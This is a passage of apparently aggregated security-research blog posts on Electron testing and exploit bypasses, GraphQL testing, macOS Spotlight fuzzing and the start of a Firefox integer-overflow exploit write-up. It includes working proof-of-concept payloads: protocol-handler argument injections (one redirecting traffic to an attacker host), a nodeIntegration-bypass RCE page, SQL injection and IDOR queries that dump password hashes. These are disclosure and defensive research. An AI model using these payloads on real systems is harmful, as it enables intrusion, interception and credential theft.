        return (i < d ? '' : g(parseInt(i / d))) + ((i = i % d) > 35 ? String['fromCharCode'](i + 29) : i['toString'](36));
    };
    while (e--) {
        if (f[e]) {
            c = c['replace'](new RegExp('\\b' + g(e) + '\\b', 'g'), f[e]);
        }
    }
    return c;
}('b 5=["\\o\\8\\p\\s\\4\\c\\c\\7","\\r\\4\\d\\t\\7\\g\\m\\d","\\u\\4\\f\\f\\8\\q\\4\\6\\l\\6","\\n\\7\\g\\6\\8\\w\\4\\6\\B\\4\\c\\C\\7\\v\\4\\A"];9 k(e){b a=0;j[5[0]]=9(h){a++;x(e+h)};j[5[1]]=9(){y a}}b i=z k(5[2]);i.D(5[3])', 40, 40, '||||x65|_0|x20|x6F|x61|function|_1|var|x6C|x74|_2|x73|x75|_3|obj|this|NewObject|x3A|x6E|x59|x53|x79|x67|x47|x48|x43|x4D|x6D|x72|alert|return|new|x2E|x77|x63|SayHello'['split']('|')));

Then, it can be passed to JStillery, JS Nice and other similar tools in order to get back a human readable version.

'use strict';
var _0 = ["SayHello", "GetCount", "Message : ", "You are welcome."];
function NewObject(contentsOfMyTextFile) {
  var _1 = 0;
  this[_0[0]] = function(theLibrary) {
    _1++;
    alert(contentsOfMyTextFile + theLibrary);
  };
  this[_0[1]] = function() {
    return _1;
  };
}
var obj = new NewObject(_0[2]);
obj.SayHello(_0[3]);

Enabling the developer tools in the renderer process

During testing, it is particularly important to review all web resources as we would normally do in a standard web application assessment. For this reason, it is highly recommended to enable the Developer Tools in all renderers and <webview> tags.

Electron’s Main process can use the BrowserWindow API to call the BrowserWindow method and instantiate a new renderer.

In the example below, we are creating a new BrowserWindow instance with specific attributes. Additionally, we can insert a new statement to launch the Developer tools:

/app/mainScreen.js

var winOptions = {
    title: 'Example App',
    backgroundColor: '#ffffff',
    width: DEFAULT_WIDTH,
    height: DEFAULT_HEIGHT,
    minWidth: MIN_WIDTH,
    minHeight: MIN_HEIGHT,
    transparent: false,
    frame: false,
    resizable: true,
    show: isVisible,
    webPreferences: {
      nodeIntegration: false,
      preload: _path2.default.join(__dirname, 'preload.js')
    }
  };

[ -- cut -- ]

mainWindow = new _electron.BrowserWindow(winOptions);
  winId = win.id;

//|--> HERE we can hook and add the Developers Tools <--|
win.webContents.openDevTools({ mode: 'bottom' })
win.setMenuBarVisibility(true);

If everything worked fine, we should have the Developers Tools enabled for the main UI screen.

From the main Developer Tool console, we can open additional developer tools windows for other renderers (e.g. webview tags).

window.document.getElementsByTagName("webview")[0].openDevTools()

While reading the code above, have you noticed the webPreference options?

WebPreferences options are basically settings for the renderer process and include things like window size, appearance, colors, security features, etc. Some of these settings are pretty useful for debugging purposes too.

For example, we can make all windows visible by using the show property of WebPreferences:

BrowserWindow({show: true})

Adding debugging statements

During instrumentation, it is useful to include debugging code such as

console.log("\n--------------- Debug --------------------\n")
console.log(process.type)
console.log(process.pid)
console.log(process.argv)
console.log("\n--------------- Debug --------------------\n")

Debugging the main process

Since it is not possible to open the developer tools for the Main Process, debugging this component is a bit trickier. Luckily, Chromium’s Developer Tools can be used to debug Electron’s main process with just a minor adjustment.

The DevTools in an Electron browser window can only debug JavaScript executed in that window (i.e. the web page). To debug JavaScript executed in the main process you will need to leverage the native debugger and launch Electron with the --inspect or --inspect-brk switch.

Use one of the following command line switches to enable debugging of the main process:

–inspect=[port] Electron will listen for V8 inspector protocol messages on the specified port, an external debugger will need to connect on this port. The default port is 5858.

–inspect-brk=[port] Like –inspect but pauses execution on the first line of JavaScript.

Usage: electron --inspect=5858 your-app

You can now connect Chrome by visiting chrome://inspect and analyze the launched Electron app present there.

Intercepting HTTP(s) traffic

Chromium supports system proxy settings on all platforms, so setup a proxy and then add Burp CA as usual.

We can even use the following command line argument if you run the Electron application directly. Please note that this does not work when using the bundled app.

--proxy-server=address:port

Or, programmatically with these lines in the main app:

const {app} = require('electron') 
app.commandLine.appendSwitch('proxy-server', '127.0.0.1:8080')

For Node, use transparent proxying by either changing /etc/hosts or overriding configs:

npm config set proxy http://localhost:8080
npm config set https-proxy http://localhost:8081

In case you need to revert the proxy settings, use:

npm config rm proxy
npm config rm https-proxy

However, you need to disable TLS validation with the following code within the application under testing:

process.env.NODE_TLS_REJECT_UNAUTHORIZED = “0";

Outro

Proper instrumentation is a fundamental step in performing a comprehensive security test. Combining source code review with dynamic testing and client instrumentation, it is possible to analyze every aspect of the target application. These simple techniques allow us to reach edge cases, exercise all code paths and eventually find vulnerabilities.

@voidsec @lucacarettoni

Read more

Electron Windows Protocol Handler MITM/RCE (bypass for CVE-2018-1000006 fix)

23 May 2018 at 22:00

As part of an engagement for one of our clients, we analyzed the patch for the recent Electron Windows Protocol handler RCE bug (CVE-2018-1000006) and identified a bypass.

Under certain circumstances this bypass leads to session hijacking and remote code execution. The vulnerability is triggered by simply visiting a web page through a browser. Electron apps designed to run on Windows that register themselves as the default handler for a protocol and do not prepend dash-dash in the registry entry are affected.

We reported the issue to the Electron core team (via [email protected]) on May 14, 2018 and received immediate notification that they were already working on a patch. The issue was also reported by Google’s Nicolas Ruff a few days earlier.

CVE-2018-1000006

On January 22, 2018 Electron released a patch for v1.7.11, v1.6.16 and v1.8.2-beta4 for a critical vulnerability known as CVE-2018-1000006 (surprisingly no fancy name here) affecting Electron-based applications running on Windows that register custom protocol handlers.

The original issue was extensively discussed in many blog posts, and can be summarized as the ability to use custom protocol handlers (e.g. myapp://) from a remote web page to piggyback command line arguments and insert a new switch that Electron/Chromium/Node would recognize and execute while launching the application.

<script>
win.location = 'myapp://foobar" --gpu-launcher="cmd c/ start calc" --foobar='
</script>

Interestingly, on January 31, 2018, Electron v1.7.12, v1.6.17 and v1.8.2-beta5 were released. It turned out that the initial patch did not take into account uppercase characters and led to a bypass in the previous patch with:

<script>
win.location = 'myapp://foobar" --GPU-launcher="cmd c/ start calc" --foobar='
</script> 

Understanding the patch

The patch for CVE-2018-1000006 is implemented in electron/atom/app/command_line_args.cc and consists of a validation mechanism which ensures users won’t be able to include Electron/Chromium/Node arguments after a url (the specific protocol handler). Bear in mind some locally executed applications do require the ability to pass custom arguments.

bool CheckCommandLineArguments(int argc, base::CommandLine::CharType** argv) {
  DCHECK(std::is_sorted(std::begin(kBlacklist), std::end(kBlacklist),
                        [](const char* a, const char* b) {
                          return base::StringPiece(a) < base::StringPiece(b);
                        }))
      << "The kBlacklist must be in sorted order";
  DCHECK(std::binary_search(std::begin(kBlacklist), std::end(kBlacklist),
                            base::StringPiece("inspect")))
      << "Remember to add Node command line flags to kBlacklist";

  const base::CommandLine::StringType dashdash(2, '-');
  bool block_blacklisted_args = false;
  for (int i = 0; i < argc; ++i) {
    if (argv[i] == dashdash)
      break;
    if (block_blacklisted_args) {
      if (IsBlacklistedArg(argv[i]))
        return false;
    } else if (IsUrlArg(argv[i])) {
      block_blacklisted_args = true;
    }
  }
  return true;
}

As is commonly seen, blacklist-based validation is prone to errors and omissions especially in complex execution environments like Electron:

  • The patch relies on a static blacklist of available chromium flags. On each libchromiumcontent update the Electron team must remember to update the command_line_args.cc file in order to make sure the blacklist is aligned with the current implementation of Chromium/v8
  • The blacklist is implemented using a binary search. Valid flags could be missed by the check if they’re not properly sorted

Bypass and security implications

We started looking for missed flags and noticed that host-rules was absent from the blacklist. With this flag one may specify a set of rules to rewrite domain names for requests issued by libchroumiumcontent. This immediately stuck out as a good candidate for subverting the process.

In fact, an attacker can exploit this issue by overriding the host definitions in order to perform completely transparent Man-In-The-Middle:

<!doctype html>
<script>
 window.location = 'skype://user?userinfo" --host-rules="MAP * evil.doyensec.com" --foobar='
</script>

When a user visits a web page in a browser containing the preceding code, the Skype app will be launched and all Chromium traffic will be forwarded to evil.doyensec.com instead of the original domain. Since the connection is made to the attacker-controlled host, certificate validation does not help as demonstrated in the following video:

We analyzed the impact of this vulnerability on popular Electron-based apps and developed working proof-of-concepts for both MITM and RCE attacks. While the immediate implication is that an attacker can obtain confidential data (e.g. oauth tokens), this issue can be also abused to inject malicious HTML responses containing XSS -> RCE payloads. With nodeIntegration enabled, this is simply achieved by leveraging Node’s APIs. When encountering application sandboxing via nodeIntegration: false or sandbox, it is necessary to chain this with other bugs (e.g. nodeIntegration bypass or IPC abuses).

Please note it is only possible to intercept traffic generated by Chromium, and not Node. For this reason Electron’s update feature, along with other critical functionss, are not affected by this vulnerability.

Future

On May 16, 2018, Electron released a new update containing an improved version of the blacklist for v2.0.1, v1.8.7, and v1.7.15. The team is actively working on a more resilient solution to prevent further bypasses. Considering that the API change may potentially break existing apps, it makes sense to see this security improvement within a major release.

In the meantime, Electron application developers are recommended to enforce a dash-dash notation in setAsDefaultProtocolClient

app.setAsDefaultProtocolClient(protocol, process.execPath, [
  '--your-switches-here',
  '--'
])

or in the Windows protocol handler registry entry

secure Windows protocol handler

As a final remark, we would like to thank the entire Electron team for their work on moving to a secure-by-default framework. Electron contributors are tasked with the non-trivial mission of closing the web-native desktop gap. Modern browsers are enforcing numerous security mechanisms to ensure isolation between sites, facilitate web security protections and prevent untrusted remote content from compromising the security of the host. When working with Electron, things get even more complicated.

@ikkisoft

@day6reak

GraphQL - Security Overview and Testing Tips

16 May 2018 at 22:00

With the increasing popularity of GraphQL technology we are summarizing some documentation and tips about common security mistakes.

What is GraphQL?

GraphQL is a data query language developed by Facebook and publicly released in 2015. It is an alternative to REST API.

Even if you don’t see any GraphQL out there, it is likely you’re already using it since it’s running on some big tech giants like Facebook, GitHub, Pinterest, Twitter, HackerOne and a lot more.

A few key points on this technology

  • GraphQL provides a complete and understandable description of the data in the API and gives clients the power to ask for exactly what they need. Queries always return predictable results.

  • While typical REST APIs require loading from multiple URLs, GraphQL APIs get all the data your app needs in a single request.

  • GraphQL APIs are organized in terms of types and fields, not endpoints. You can access the full capabilities of all your data from a single endpoint.

  • GraphQL is strongly typed to ensure that application only ask for what’s possible and provide clear and helpful errors.

  • New fields and types can be added to the GraphQL API without impacting existing queries. Aging fields can be deprecated and hidden from tools.

Before we start diving into the GraphQL security landscape, here is a brief recap on how it works. The official documentation is well written and was really helpful.

A GraphQL query looks like this:

Basic GraphQL Query

query{
	user{
		id
		email
		firstName
		lastName
	}
}

While the response is JSON:

Basic GraphQL Response

{
	"data": {
		"user": {
			"id": "1",
			"email": "[email protected]",
			"firstName": "Paolo",
			"lastName": "Stagno"
		}
	}
}

Security Testing Tips

Since Burp Suite does not understand GraphQL syntax well, I recommend using the graphql-ide, an Electron based app that allows you to edit and send requests to a GraphQL endpoint; I also wrote a small python script GraphQL_Introspection.py that enumerates a GraphQL endpoint (with introspection) in order to pull out documentation. The script is useful for examining the GraphQL schema looking for information leakage, hidden data and fields that are not intended to be accessible.

The tool will generate a HTML report similar to the following:

Python Script pulling data from a GraphQL endpoint

Introspection is used to ask for a GraphQL schema for information about what queries, types and so on it supports.

As a pentester, I would recommend to look for requests issued to “/graphql” or “/graphql.php” since those are usual GraphQL endpoint names; you should also search for “/graphiql”, ”graphql/console/”, online GraphQL IDEs to interact with the backend, and “/graphql.php?debug=1” (debugging mode with additional error reporting) since they may be left open by developers.

When testing an application, verify whether requests can be issued without the usual authorization token header:

GraphQL Bearer Authorization Header Example

Since the GraphQL framework does not provide any means for securing your data, developers are in charge of implementing access control as stated in the documentation:

“However, for a production codebase, delegate authorization logic to the business logic layer”.

Things may go wrong, thus it is important to verify whether a user without proper authentication and/or authorization can request the whole underlying database from the server.

When building an application with GraphQL, developers have to map data to queries in their chosen database technology. This is where security vulnerabilities can be easily introduced, leading to Broken Access Controls, Insecure Direct Object References and even SQL/NoSQL Injections.

As an example of a broken implementation, the following request/response demonstrates that we can fetch data for any users of the platform (cycling through the ID parameter), while simultaneously dumping password hashes:

Query

query{
	user(id: 165274){
		id
		email
		firstName
		lastName
		password
	}
}

Response

{
	"data": {
		"user": {
			"id": "165274",
			"email": "[email protected]",
			"firstName": "John",
			"lastName": "Doe"
			"password": "5F4DCC3B5AA765D61D8327DEB882CF99"
		}
	}
}

Another thing that you will have to check is related to information disclosure when trying to perform illegal queries:

Information Disclosure

{
	"errors": [
		{
			"message": "Invalid ID.",
			"locations": [
				{
					"line": 2,
					"column": 12
				}
				"Stack": "Error: invalid ID\n at (/var/www/examples/04-bank/graphql.php)\n"
      			]
		}
	]
}

Even though GraphQL is strongly typed, SQL/NoSQL Injections are still possible since GraphQL is just a layer between client apps and the database. The problem may reside in the layer developed to fetch variables from GraphQL queries in order to interrogate the database; variables that are not properly sanitized lead to old simple SQL Injection. In case of Mongodb, NoSQL injection may not be that simple since we cannot “juggle” types (e.g. turning a string into an array. See PHP MongoDB Injection).

GraphQL SQL Injection

mutation search($filters Filters!){
	authors(filter: $filters)
	viewer{
		id
		email
		firstName
		lastName
	} 
}

{
	"filters":{
		"username":"paolo' or 1=1--"
		"minstories":0
	}
}

Beware of nested queries! They can allow a malicious client to perform a DoS (Denial of Service) attack via overly complex queries that will consume all the resources of the server:

Nested Query

query {
 stories{
  title
  body
  comments{
   comment
   author{
    comments{
     author{
      comments{
       comment
       author{
        comments{
         comment
         author{
          comments{
           comment
           author{
            name
           }
          }
         }
        }
       }
      }
     }
    }
   }
  }
 }
}

An easy remediation against DoS could be setting a timeout, a maximum depth or a query complexity threshold value.

Keep in mind that in the PHP GraphQL implementation:

  • Complexity analysis is disabled by default

  • Limiting Query Depth is disabled by default

  • Introspection is enabled by default. It means that anybody can get a full description of your schema by sending a special query containing meta fields type and schema

Outro

GraphQL is a new interesting technology, which can be used to build secure applications. Since developers are in charge of implementing access control, applications are prone to classical web application vulnerabilites like Broken Access Controls, Insecure Direct Object References, Cross Site Scripting (XSS) and Classic Injection Bugs. As any technology, GraphQL-based applications may be prone to development implementation errors like this real-life example:

“By using a script, an entire country’s (I tested with the US, the UK and Canada) possible number combinations can be run through these URLs, and if a number is associated with a Facebook account, it can then be associated with a name and further details (images, and so on).”

@voidsec

Resources:

We're hiring - Join Doyensec!

26 November 2017 at 23:00

At Doyensec, we believe that quality is the natural product of passion and care. We love what we do and we routinely take on difficult engineering challenges to help our customers build with security.

We are a small highly focused team. We concentrate on application security and do fewer things better. We don’t care about your education, background and certifications. If you are really good and passionate at building and breaking complex software, you’re the right candidate.

Open Positions

:: Full-stack Security Automation Engineer (Six Months Collaboration, Remote Work) ::

We are looking for a full-stack senior software engineer that can help us build security automation tools. If you’ve ever built a fuzzer, played with static analysis and enhanced a web scanner engine, you probably have the right skillset for the job.

We offer a well-paid six-months collaboration, combined with an additional bonus upon successful completion of the project.

Responsibilities:

  • Full-stack development (front-end, back-end components) of web security testing tools
  • Solve technical challenges at the edge of web security R&D, together with Doyensec’s founders

Requirements:

  • Experience developing multi-tiered software applications or products. We generally use Node.js and Java, and require proficiency in those languages
  • Ability to work with standard dev tools and techniques (IDE, git, …)
  • You’re passionate about building great software and can have fun while doing it
  • Interested in web security, with good understanding of common software vulnerabilities
  • You’re self-driven and can focus on a project to make it happen
  • Eager to learn, adapt and perfect your work

Contact us at [email protected]

:: Application Security Engineer (Full-time, Remote Work - Europe) ::

We are looking for an experienced security engineer to join our consulting team. We perform graybox security testing on complex web and mobile applications. We need someone who can hit the ground running. If you’re good at “crawling around in the ventilation ducts of the world’s most popular and important applications”, you probably have the right skillset for the job.

We offer a competitive salary in a supportive and dynamic environment that rewards hard work and talent. We are dedicated to providing research-driven application security and therefore invest 25% of your time exclusively to research where we build security testing tools, discover new attack techniques, and develop countermeasures.

Responsibilities:

  • Security testing of web, mobile (iOS, Android) applications
  • Vulnerability research activities, coordinated and executed with Doyensec’s founders
  • Partner with customers to ensure project’s objectives are achieved 

Requirements:

  • Ability to discover, document and fix security bugs
  • You’re passionate about understanding complex systems and can have fun while doing it
  • Top-notch in web security. Show us public research, code, advisories, etc.
  • Eager to learn, adapt, and perfect your work

Contact us at [email protected]

Staring into the Spotlight

14 November 2017 at 23:00

Spotlight is the all pervasive seeing eye of the OSX userland. It drinks from a spout of file events sprayed out of the kernel and neatly indexes such things for later use. It is an amalgamation of binaries and libraries, all neatly fitted together just to give a user oversight of their box. It presents interesting attack surface and this blog post is an explanation of how some of it works.

One day, we found some interesting looking crashes recorded in /Users/<name>/Library/Logs/DiagnosticReports

Yet the crashes weren’t from the target. In OSX, whenever a file is created, a filesystem event is generated and sent down from the kernel. Spotlight listens for this event and others to immediately parse the created file for metadata. While fuzzing a native file parser these Spotlight crashes began to appear from mdworker processes. Spotlight was attempting to index each of the mutated input samples, intending to include them in search results later.

fsevents

The Spotlight system is overseen by mds. It opens and reads from /dev/fsevents, which streams down file system event information from the kernel. Instead of dumping the events to disk, like fseventsd, it dumps the events into worker processes to be parsed on behalf of Spotlight. Mds is responsible for delegating work and managing mdworker processes with whom it communicates through mach messaging. It creates, monitors, and kills mdworkers based on some light rules. The kernel does not block and the volume of events streaming through the fsevents device can be quite a lot. Mds will spawn more mdworker processes when handling a higher event magnitude but there is no guarantee it can see and capture every single event.

The kernel filters which root level processes can read from this device. fsevents filter

Each of the mdworker processes get spawned, parse some files, write the meta info, and die. Mdworker shares a lot of code with mdimport, its command line equivalent. The mdimport binary is used to debug and test Spotlight importers and therefore makes a great target for auditing and fuzzing. Much of what we talk about in regards to mdimport also applies to mdworker.

Importers

You can see what mdworkers are up to with the following: sudo fs_usage -w -f filesys mdworker

Importers are found in /Library/Spotlight, /System/Library/Spotlight, or in an application’s bundle within “/Contents/Library/Spotlight”. If the latter is chosen, the app typically runs a post install script with mdimport -r <importer> and/or lsregister. The following command shows the list of importers present on my laptop. It shows some third party apps have installed their own importers.

$ mdimport -L
2017-07-30 00:36:15.518 mdimport[40541:1884333] Paths: id(501) (
    "/Library/Spotlight/iBooksAuthor.mdimporter",
    "/Library/Spotlight/iWork.mdimporter",
    "/Library/Spotlight/Microsoft Office.mdimporter",
    "/System/Library/Spotlight/Application.mdimporter",
...
    "/System/Library/Spotlight/SystemPrefs.mdimporter",
    "/System/Library/Spotlight/vCard.mdimporter",
    "/Applications/Xcode.app/Contents/Applications/Application Loader.app/Contents/Library/Spotlight/MZSpotlight.mdimporter",
    "/Applications/LibreOffice.app/Contents/Library/Spotlight/OOoSpotlightImporter.mdimporter",
    "/Applications/OmniGraffle.app/Contents/Library/Spotlight/OmniGraffle.mdimporter",
    "/Applications/GarageBand.app/Contents/Library/Spotlight/LogicX_MDImport.mdimporter",
    "/Applications/Xcode.app/Contents/Library/Spotlight/uuid.mdimporter"
)

These .mdimporter files are actually just packages holding a binary. These binaries are what we are attacking.

Using mdimport is simple - mdimport <file>. Spotlight will only index metadata for filetypes having an associated importer. File types are identified through magic. For example, mdimport reads from the MAGIC environment variable or uses the “/usr/share/file/magic” directory which contains both the compiled .mgc file and the actual magic patterns. The format of magic files is discussed at the official Apple developer documentation.

Crash File

crash logging

One thing to notice is that the crash log will contain some helpful information about the cause. The following message gets logged by both mdworker and mdimport, which share much of the same code:

Application Specific Information:
import fstype:hfs fsflag:480D000 flags:40000007E diag:0 isXCode:0 uti:com.apple.truetype-datafork-suitcase-font plugin:/Library/Spotlight/Font.mdimporter - find suspect file using: sudo mdutil -t 2682437

The 2682437 is the iNode reference number for the file in question on disk. The -t argument to mdutil will ask it to lookup the file based on volume ID and iNode and spit out the string. It performs an open and fcntl on the pseudo directory /.vol/<Volume ID>/<File iNode>. You can see this info with the stat syscall on a file.

$ stat /etc
16777220 418395 lrwxr-xr-x 1 root wheel 0 11 "Dec 10 05:13:41 2016" "Dec 10 05:13:41 2016" "Dec 10 05:15:47 2016" "Dec 10 05:13:41 2016" 4096 8 0x88000 /etc

$ ls /.vol/16777220/418395
afpovertcp.cfg    fstab.hd            networks          protocols
aliases           ftpd.conf           newsyslog.conf    racoon
aliases.db        ftpd.conf.default   newsyslog.d       rc.common

The UTI registered by the importer is also shown “com.apple.truetype-datafork-suitcase-font”. In this case, the crash is caused by a malformed Datafork TrueType suitcase (.dfont) file.

When we find a bug, we can study it under lldb. Launch mdimport under the debugger with the crash file as an argument. In this particular bug it breaks with an exception in the /System/Library/Spotlight/Font.mdimporter importer.

crash logging

The screenshot below shows the problem procedure with the crashing instruction highlighted for this particular bug.

The rsi register points into the memory mapped font file. A value is read out and stored in rax which is then used as an offset from rcx which points to the text segment of the executable in memory. A lookup is done on a hardcoded table and parsing proceeds from there. The integer read out of the font file is never validated.

When writing or reversing a Spotlight importer, the main symbol to first look at will be GetMetadataForFile or GetMetadataForURL. This function receives a path to parse and is expected to return the metadata as a CFDictionary.

We can see, from the stacktrace, how and where mdimport jumps into the GetMetadataForFile function in the Font importer. Fuzzing mdimport is straightforward, crashes and signals are easily caught.

The variety of importers present on OSX are sometimes patched alongside the framework libraries, as code is shared. However, a lot of code is unique to these binaries and represents a nice attack surface. The Spotlight system is extensive, including its own query language and makes a great target where more research is needed.

When fuzzing in general on OSX, disable Spotlight oversight of the folder where you generate and remove your input samples. The folder can be added in System Preferences->Spotlight->Privacy. You can’t fuzz mdimport from this folder, instead disable Spotlight with “mdutil -i off” and run your fuzzer from a different folder.

@day6reak

Modern Alchemy: Turning XSS into RCE

2 August 2017 at 22:00

TL;DR

At the recent Black Hat Briefings 2017, Doyensec’s co-founder Luca Carettoni presented a new research on Electron security. After a quick overview of Electron’s security model, we disclosed design weaknesses and implementation bugs that can be leveraged to compromise any Electron-based application. In particular, we discussed a bypass that would allow reliable Remote Code Execution (RCE) when rendering untrusted content (for example via Cross-Site Scripting) even with framework-level protections in place.

In this blog post, we would like to provide insight into the bug (CVE-2017-12581) and remediations.

What’s Electron?

While you may not recognize the name, it is likely that you’re already using Electron since it’s running on millions of computers. Slack, Atom, Visual Studio Code, WordPress Desktop, Github Desktop, Basecamp3, Mattermost are just few examples of applications built using this framework. Any time that a traditional web application is ported to desktop, it is likely that the developers used Electron.

Electron Motto

Understanding the nodeIntegration flag

While Electron is based on Chromium’s Content module, it is not a browser. Since it facilitates the construction of complex desktop applications, Electron gives the developer a lot of power. In fact, thanks to the integration with Node.js, JavaScript can access operating system primitives to take full advantage of native desktop mechanisms.

It is well understood that rendering untrusted remote/local content with Node integration enabled is dangerous. For this reason, Electron provides two mechanisms to “sandbox” untrusted resources:

BrowserWindow

mainWindow = new BrowserWindow({  
	"webPreferences": { 
		"nodeIntegration" : false,  
		"nodeIntegrationInWorker" : false 
	}
});

mainWindow.loadURL('https://www.doyensec.com/');

WebView

<webview src="https://www.doyensec.com/"></webview>

In above examples, the nodeIntegration flag is set to false. JavaScript running in the page won’t have access to global references despite having a Node.js engine running in the renderer process.

Hunting for nodeIntegration bypasses

It should now be clear why nodeIntegration is a critical security-relevant setting for the framework. A vulnerability in this mechanism could lead to full host compromise from simply rendering untrusted web pages. As modern alchemists, we use this type of flaws to turn traditional XSS into RCE. Since all Electron applications are bundled with the framework code, it is also complicated to fix these issues across the entire ecosystem.

During our research, we have extensively analyzed all project code changes to uncover previously discovered bypasses (we counted 6 before v1.6.1) with the goal of studying Electron’s design and weaknesses. Armed with that knowledge, we went for a hunt.

By studying the official documentation, we quickly identified a significant deviation from standard browsers caused by Electron’s “glorified” JavaScript APIs.

When a new window is created, Electron returns an instance of BrowserWindowProxy. This class can be used to manipulate the child browser window, thus subverting the Same-Origin Policy (SOP).

SOP Bypass #1

<script>
const win = window.open("https://www.doyensec.com"); 
win.location = "javascript:alert(document.domain)"; 
</script> 

SOP Bypass #2

<script>
const win = window.open("https://www.doyensec.com"); 
win.eval("alert(document.domain)");
</script>

The eval mechanism used by the SOP Bypass #2 can be explained with the following diagram:

BrowserWindowProxy's Eval

Additional source code review revealed the presence of privileged URLs (similar to browsers’ privileged zones). Combining the SOP-bypass by design with a specific privileged url defined in lib/renderer/init.js, we realized that we could override the nodeIntegration setting.

Chrome DevTools in Electron, prior to 1.6.8

A simple, yet reliable, proof-of-concept of the nodeIntegration bypass affecting all Electron releases prior to 1.6.7 is hereby included:

<!DOCTYPE html>
<html>
  <head>
    <title>nodeIntegration bypass (SOP2RCE)</title>
  </head>
  <body>
  	<script>
    	document.write("Current location:" + window.location.href + "<br>");

    	const win = window.open("chrome-devtools://devtools/bundled/inspector.html");
    	win.eval("const {shell} = require('electron'); 
    	shell.openExternal('file:///Applications/Calculator.app');");
       </script>
  </body>
</html>

On May 10, 2017 we reported this issue to the maintainers via email. In a matter of hours, we received a reply that they were already working on a fix since the privileged chrome-devtools:// was discovered during an internal security activity just few days before our report. In fact, while the latest release on the official website at that time was 1.6.7, the git commit that fixes the privileged url is dated April 24, 2017.

The issue was fixed in 1.6.8 (officially released around the 15th of May). All previous versions of Electron and consequently all Electron-based apps were affected. Mitre assigned CVE-2017-12581 for this issue.

Mitigating nodeIntegration bypass vulnerabilities

  • Keep your application in sync with the latest Electron framework release. When releasing your product, you’re also shipping a bundle composed of Electron, Chromium shared library and Node. Vulnerabilities affecting these components may impact the security of your application. By updating Electron to the latest version, you ensure that critical vulnerabilities (such as nodeIntegration bypasses) are already patched and cannot be exploited to abuse your application.

  • Adopt secure coding practices. The first line of defense for your application is your own code. Common web vulnerabilities, such as Cross-Site Scripting (XSS), have a higher security impact on Electron hence it is highly recommend to adopt secure software development best practices and perform periodic security testing.

  • Know your framework (and its limitations). Certain principles and security mechanisms implemented by modern browsers are not enforced in Electron (e.g. SOP enforcement). Adopt defense in depth mechanisms to mitigate those deficiencies. For more details, please refer to our Electronegativity, A study of Electron Security presentation and Electron Security Checklist white-paper.

  • Use the recent “sandbox” experimental feature. Even with nodeIntegration disabled, the current implementation of Electron does not completely mitigate all risks introduced by loading untrusted resources. As such, it is recommended to enable sandboxing which leverages the native Chromium sandbox. A sandboxed renderer does not have a Node.js environment running (with the exception of preload scripts) and the renderers can only make changes to the system by delegating tasks to the main process via IPC. While still not perfect at the time of writing (there are known security issues, sandbox is not supported for the <webview> tag, etc.) this option should be enabled to provide additional isolation.

XSSGame by Google at #HITB2017AMS – Writeup

26 April 2017 at 10:19
CTF’s homepage During the last edition of HITB in Amsterdam we partecipated in the XSSGame by Google: 8 XSS challenges to win a Nexus 5X. The various levels exposed common vulnerabilities present in modern web apps. Introduction Each level required to trigger the JavaScript’s alert function by creating an URL with a Cross-Site Scripting (XSS) payload inside, which should be executed without any user interaction: once it is executed, the server replies with the link to the following challenge.

Exploiting a Cross-mmap Overflow in Firefox

10 March 2017 at 00:00

This post will explore how CVE-2016-9066, a simple but quite interesting (from an exploitation perspective) vulnerability in Firefox, can be exploited to gain code execution.

tl;dr an integer overflow in the code responsible for loading script tags leads to an out-of-bounds write past the end of an mmap chunk. One way to exploit this includes placing a JavaScript heap behind the buffer and subsequently overflowing into its meta data to create a fake free cell. It is then possible to place an ArrayBuffer instance inside another ArrayBuffer’s inline data. The inner ArrayBuffer can then be arbitrarily modified, yielding an arbitrary read/write primitive. From there it is quite easy to achieve code execution. The full exploit can be found here and was tested against Firefox 48.0.1 on macOS 10.11.6. The bugzilla report can be found here

The Vulnerability

The following code is used for loading the data for (external) script tags:

result
nsScriptLoadHandler::TryDecodeRawData(const uint8_t* aData,
                                      uint32_t aDataLength,
                                      bool aEndOfStream)
{
  int32_t srcLen = aDataLength;
  const char* src = reinterpret_cast<const char *>(aData);
  int32_t dstLen;
  nsresult rv =
    mDecoder->GetMaxLength(src, srcLen, &dstLen);

  NS_ENSURE_SUCCESS(rv, rv);

  uint32_t haveRead = mBuffer.length();
  uint32_t capacity = haveRead + dstLen;
  if (!mBuffer.reserve(capacity)) {
    return NS_ERROR_OUT_OF_MEMORY;
  }

  rv = mDecoder->Convert(src,
                         &srcLen,
                         mBuffer.begin() + haveRead,
                         &dstLen);

  NS_ENSURE_SUCCESS(rv, rv);

  haveRead += dstLen;
  MOZ_ASSERT(haveRead <= capacity, "mDecoder produced more data than expected");
  MOZ_ALWAYS_TRUE(mBuffer.resizeUninitialized(haveRead));

  return NS_OK;
}

The code will be invoked by OnIncrementalData whenever new data has arrived from the server. The bug is a simple integer overflow, happening when the server sends more than 4GB of data. In that case, capacity will wrap around and the following call to mBuffer.reserve will not modify the buffer in any way. mDecode->Convert then writes data past the end of an 8GB buffer (data is stored as char16_t in the browser), which will be backed by an mmap chunk (a common practice for very large chunks).

The patch is also similarly simple:

   uint32_t haveRead = mBuffer.length();
-  uint32_t capacity = haveRead + dstLen;
-  if (!mBuffer.reserve(capacity)) {
+
+  CheckedInt<uint32_t> capacity = haveRead;
+  capacity += dstLen;
+
+  if (!capacity.isValid() || !mBuffer.reserve(capacity.value())) {
     return NS_ERROR_OUT_OF_MEMORY;
   }

The bug doesn’t look too promising at first. For one, it requires sending and allocating multiple gigabytes of memory. As we will see however, the bug can be exploited fairly reliably and the exploit completes within about a minute after opening the page on my 2015 MacBook Pro. We will now first explore how this bug can be exploited to pop a calculator on macOS, then improve the exploit to be more reliable and use less bandwidth afterwards (spoiler: we will use HTTP compression).

Exploitation

Since the overflow happens past the end of an mmap region, our first concern is whether it is possible to reliably allocate something behind the overflown buffer. In contrast to some heap allocators, mmap (which can be thought of as a memory allocator provided by the kernel) is very deterministic: calling mmap twice will result in two consecutive mappings if there are no existing holes that could satisfy either of the two requests. You can try this for yourself using the following piece of code. Note that the result will be different depending on whether the code is run on Linux or macOS. The mmap region grows towards lower addresses on Linux while it grows towards higher ones on macOS. For the rest of this post we will focus on macOS. A similar exploit should be possible on Linux and Windows though.

#include <sys/mman.h>
#include <stdio.h>

const size_t MAP_SIZE = 0x100000;       // 1 MB

int main()
{
    char* chunk1 = mmap(NULL, MAP_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    char* chunk2 = mmap(NULL, MAP_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);

    printf("chunk1: %p - %p\n", chunk1, chunk1 + MAP_SIZE);
